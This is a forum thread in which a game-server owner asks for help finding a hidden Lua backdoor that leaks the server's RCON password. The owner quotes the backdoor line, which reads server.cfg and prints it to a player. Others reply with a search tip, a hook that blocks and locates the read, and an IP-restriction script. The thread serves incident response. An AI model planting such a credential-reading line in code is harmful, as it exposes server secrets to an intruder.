Well, there's this guy; let's call him "Ass" had a temporary access to my FTP and hided a code in it, that code gives him the Rcon.I managed to find the command that prints the rcon
player.GetByID(3):PrintMessage(HUD_PRINTCONSOLE, string.sub(file.Read("../cfg/server.cfg"), 1, 200))
Please help.
delete it?
It's HIDED somewhere in the lua files, i don't know wich one obviously.
Open all lua files in notepad++
Search in all files for "server.cfg".
I use Filezilla and ... well i can't do that.
Yes you can. You can select lua files to be opened by notepad++ by standard. select the files in filezilla rightclick and view and edit. or something
It would take DAYS...There is a lot of Addon on my Server, too many Lua files...
Days? I don't think so. But either take the time, or let him have control of your server.
A quick and dirty fix to block that file.Read command until you find its location: (save in lua/includes/enums/!.lua and reload the map)
[lua]require('file')
require('debug')
local file = file
local debug = debug
local FileRead = file.Read
local DebugGetinfo= debug.getinfo
function _G.file.Read(Path, User)
if Path == "../cfg/server.cfg" then
local Backdoor = DebugGetinfo(2, "S").short_src
Msg("************************************\n")
Msg("************************************\n")
Msg("Found backdoor at " .. Backdoor .. "!\n")
Msg("************************************\n")
Msg("************************************\n")
return "nope";
end
return FileRead(Path, User)
end[/lua]
Thanks !
[QUOTE=q3k;26606909]A quick and dirty fix to block that file.Read command until you find its location: (save in lua/includes/enums/!.lua and reload the map)
[lua]require('file')
require('debug')
local file = file
local debug = debug
local FileRead = file.Read
local DebugGetinfo= debug.getinfo
function _G.file.Read(Path, User)
if Path == "../cfg/server.cfg" then
local Backdoor = DebugGetinfo(2, "S").short_src
Msg("************************************\n")
Msg("************************************\n")
Msg("Found backdoor at " .. Backdoor .. "!\n")
Msg("************************************\n")
Msg("************************************\n")
return "nope";
end
return FileRead(Path, User)
end[/lua][/QUOTE]
They can bypass that.
[QUOTE=Snatch932;26607862]They can bypass that.[/QUOTE]
No shit, Cubar.
Too bad you missed the "quick and dirty" part.
By the way, could someone check if that file (that works with the Rcon protecter (.dll)
[lua]require( "rcon" )
hook.Add("RCON_CheckPassword", "MultiPass", function( pass, ip, port )
if ( ip != "MyIp" ) then
for _, ply in ipairs( player.GetAll() ) do
if ( string.find( ply:IPAddress(), ip ) ) then
ply:Kick( "Nice try..." )
break
end
end
return false
end
end )
hook.Add("RCON_WriteDataRequest", "ProcessData", function( id, request, data, ip, port )
if ( ip != "MyIp" ) then
for _, ply in ipairs( player.GetAll() ) do
if ( string.find( ply:IPAddress(), ip ) ) then
ply:Kick( "Nice try..." )
break
end
end
return false
end
end )
}
RCON_RestrictedCommands = {"lua_run"}[/lua]
[QUOTE=Snatch932;26607862]They can bypass that.[/QUOTE]
It's not a permanent block, it's so he can find out what file is doing it.
[QUOTE=Tiagos360;26607934]By the way, could someone check if that file (that works with the Rcon protecter (.dll)[/QUOTE]
This just limits rcon to be accessible only from --snip--. Is this your IP?
Yeah, but the problem is that the Ass can use the Rcon... (please don't show my ip ^^)
Sorry, you need to Log In to post a reply to this thread.
